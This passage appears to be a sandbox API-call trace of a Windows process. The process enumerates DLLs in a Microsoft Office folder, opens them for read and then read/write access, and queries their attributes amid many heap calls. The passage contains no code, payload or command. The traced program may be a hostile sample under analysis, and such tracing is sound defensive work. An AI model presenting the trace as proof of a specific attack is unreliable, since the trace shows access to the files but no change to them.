hHeap=0x20000) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0099.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0099.607] AreFileApisANSI () returned 1 [0099.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 88 [0099.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0099.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.608] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.608] AreFileApisANSI () returned 1 [0099.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0099.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81358 [0099.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=88 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 88 [0099.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.698] GetFileType (hFile=0x33c) returned 0x1 [0099.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0099.698] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.698] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.699] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.699] CloseHandle (hObject=0x33c) returned 1 [0099.699] AreFileApisANSI () returned 1 [0099.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0099.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0099.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81cb0, cchWideChar=88 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 88 [0099.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.699] GetFileType (hFile=0x33c) returned 0x1 [0099.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0099.699] CloseHandle (hObject=0x33c) returned 1 [0099.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.700] AreFileApisANSI () returned 1 [0099.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81358 [0099.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=88 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 88 [0099.701] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd115de42, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd115de42, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd158a009, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0099.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.701] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0d0baf0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0d0baf0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0eaf4e3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0099.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0099.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0099.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.702] AreFileApisANSI () returned 1 [0099.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 79 [0099.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.702] AreFileApisANSI () returned 1 [0099.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c6f8 [0099.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8c6f8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 79 [0099.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.703] GetFileType (hFile=0x33c) returned 0x1 [0099.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.703] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.703] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.703] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.703] CloseHandle (hObject=0x33c) returned 1 [0099.703] AreFileApisANSI () returned 1 [0099.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8ca40 [0099.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 79 [0099.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.704] GetFileType (hFile=0x33c) returned 0x1 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.704] CloseHandle (hObject=0x33c) returned 1 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.705] AreFileApisANSI () returned 1 [0099.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c500 [0099.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8c500, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 79 [0099.705] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0d0baf0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0d0baf0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0eaf4e3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.705] 